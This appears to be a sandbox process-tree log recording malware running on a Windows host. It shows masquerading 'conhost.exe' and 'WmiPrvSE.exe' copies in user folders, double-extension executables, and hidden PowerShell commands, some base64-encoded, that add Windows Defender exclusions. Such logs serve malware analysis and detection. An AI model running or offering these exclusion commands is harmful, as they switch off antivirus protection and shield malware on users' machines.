- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7556
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8068
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:3432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7788
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6700
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7352
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:2276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6020
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:3396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6312
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7488
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5728
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7324
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8124
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6200
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4532
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAEQALQBtAHAAcABSAGUAZgBlAHIARQBuAGMAZQAgAC0AZQBYAGMATABVAFMASQBPAE4AcABhAHQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBlAHQAaABvAGQAXABUAHkAcABlAEkAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAQwBFADsAIABhAGQARAAtAG0AcABQAFIAZQBmAEUAcgBFAE4AQwBFACAALQBFAFgAYwBsAHUAUwBpAG8ATgBQAHIAbwBjAEUAUwBTACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBlAHQAaABvAGQAXABUAHkAcABlAEkAZAAuAGUAeABlACAALQBGAG8AUgBDAEUA
1⤵
- Command and Scripting Interpreter: PowerShell
PID:3764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6004
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:764
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8444
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8452
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8784
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:9200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8792
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9052
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9060
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:3968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8384
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:9632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8392
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4456
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6512
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9300
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:9252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9316
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7356
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9120
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9736
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9784
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:9876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6240
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:2276
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:9136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8524
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3732
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:5632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1596 -ip 1596
1⤵
PID:4496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer\WmiPrvSE.exe
1⤵
PID:9952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer\WmiPrvSE.exe
1⤵
PID:9984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9452
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:9924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9476
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:6616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5376
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1036
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8384

C:\Users\Admin\AppData\Roaming\Method\TypeId.exe
C:\Users\Admin\AppData\Roaming\Method\TypeId.exe
1⤵
PID:6168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9752
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:3032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9820
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:2776
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:9524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9084
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5136
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:9288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7952
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7164

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:6004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQQByAGUAQQB1AGQAaQB0AFIAdQBsAGUAcwBDAGEAbgBvAG4AaQBjAGEAbAAuAGUAeABlADsA
1⤵
- Command and Scripting Interpreter: PowerShell
PID:8428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\oiiu\KOEMHX~1.EXE C:\Users\Admin\AppData\Roaming\oiiu\VQHSHL~1.MSC
1⤵
PID:9072
- C:\Users\Admin\AppData\Roaming\oiiu\koemhx.mp2.exe
  C:\Users\Admin\AppData\Roaming\oiiu\KOEMHX~1.EXE C:\Users\Admin\AppData\Roaming\oiiu\VQHSHL~1.MSC
  2⤵
  PID:3264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8304
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:9076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:1208
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c c:\vjxs\WSCMNO~1.EXE c:\vjxs\fvpgftw.msc
1⤵
PID:7752
- \??\c:\vjxs\wscmnoqdwk.3gp.exe
  c:\vjxs\WSCMNO~1.EXE c:\vjxs\fvpgftw.msc
  2⤵
  PID:1716
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath c:\vjxs
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5668
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:740
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbs'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6460
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:8724
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '*.vbs'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7988
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '*.vbe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6956
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:1028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3812
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer\WmiPrvSE.exe
1⤵
PID:7688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer\WmiPrvSE.exe
1⤵
PID:7908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8008
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:9512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3040
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8084
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:10508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8680
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7292
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:10904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6940
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:11136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\pgkv\ILRCPH~1.EXE C:\Users\Admin\pgkv\DAIARS~1.DOC
1⤵
PID:9972
- C:\Users\Admin\pgkv\ilrcphdp.jpg.exe
  C:\Users\Admin\pgkv\ILRCPH~1.EXE C:\Users\Admin\pgkv\DAIARS~1.DOC
  2⤵
  PID:9096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6084
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:11200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9800
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:11020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3900
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:5732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6944
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:8936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:2788
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:5492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9924
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:3656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7812
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6372
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:9312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:6556
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:4868
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:10412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:10604
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:10612
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:4512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:10936
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:7460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:10944
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:9276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:11228
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:12104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:11236
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:11916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:10584
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:3012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:10544
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:12132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:3016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:5960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:7980
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:2852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8372
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:12064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:8052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:10640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\conhost.exe" ..
1⤵
PID:9884
- C:\Users\Admin\AppData\Roaming\conhost.exe
  C:\Users\Admin\AppData\Roaming\conhost.exe ..
  2⤵
  PID:11964

